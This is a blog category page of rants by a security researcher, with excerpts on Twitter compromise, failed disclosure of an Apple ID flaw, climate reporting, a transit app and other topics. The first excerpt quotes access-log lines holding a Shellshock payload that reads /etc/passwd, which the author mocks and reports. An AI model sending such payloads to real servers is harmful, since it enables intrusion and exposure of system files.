85.25.242.250 – – [28/Sep/2014:09:20:12 -0400] “GET / HTTP/1.1” 301 281 “-” “() { foo;};echo;/bin/cat /etc/passwd” 85.25.242.250 – – [28/Sep/2014:22:30:48 -0400] “GET / HTTP/1.1” 500 178 “-” “() { foo;};echo;/bin/cat /etc/passwd” Dear very stupid attacker, you have the opsec of a small kitten who is surprised by his own tail. Reported.
Category: Rants
Stop. Just stop.
In the last few weeks, a prominent researcher, Dragos Ruiu (@dragosr) has put his neck out describing some interesting issues with a bunch of his computers. If his indicators of compromise are to be believed (and there is the first problem), we have a significant issue. The problem is the chorus of “It’s not real”…
So your Twitter has been hacked. Now what?
So I’m getting a lot of Twitter spam with links to install bad crap on my computer. More than just occasionally, these DM’s are sent by folks in the infosec field. They should know better than to click unknown links without taking precautions. So what do you need to do? Simple. Follow these basic NIST…
El Reg and the troubling case of climate denialism
This post is a last resort as I’ve had two comments rejected by the moderators at The Register, one of my favorite IT news websites. Lewis Page is a regular contributor to the Register. For whatever reason, around 50% of his total output there is (willful mis-) reporting on various papers and research on climate…
Infosec apostasy
I’ve been mulling this one over for a while. And honestly, after a post to an internal global mail list at work putting forward my ideas, I’ve come to realise there are at least two camps in information security: Those who aim via various usual suspects to protect things Those who aim via various often…
Marketing – first against the wall when the revolution comes
A colleague of mine just received one of those awful marketing calls where the vendor rings *you* and demands your personal information “for privacy reasons” before continuing with the phone call. *Click* As a consumer, you must hang up to avoid being scammed. End of story. No exceptions. Even if the business has a relationship…
Responsible disclosure failed – Apple ID password reset flaw
Responsible disclosure is a double edged sword. The faustian bargain is I keep my mouth shut to give you time to fix the flaws, not ignore me. I would humbly suggest that it is very relevant to your interests when a top security researcher submits a business logic flaw to you that is trivially exploitable…
PTV iPhone app – worst public transport app ever, or just pure evil?
I take the train between Marshall and Southern Cross Station, a terminus station with 14 or 15 platforms and hundreds of V/Line country, suburban and bus services daily. I had an app that worked (the old MetLink app). That wasn’t stellar, but it worked well enough that I didn’t need to get a paper timetable….
Shame, Slashdot, Shame – misogyny and moderation
Our industry suffers from a lack of women – women in senior positions are very rare, women who do what I do I can count on my hands without resorting to binary, and there are so few women coming out of Uni comp sci, developers and engineering courses that I can use and craft into…
Political expediency
Last week, Julia Gillard listened to Clubs Australia and the few voters out at Rooty Hill RSL rather than do the right thing and fix problem gambling. In her announcement, she used the code word “gaming”, which is industry speak that doesn’t like to be called “gambling”. By using this special phrase, it’s obvious that for-profit…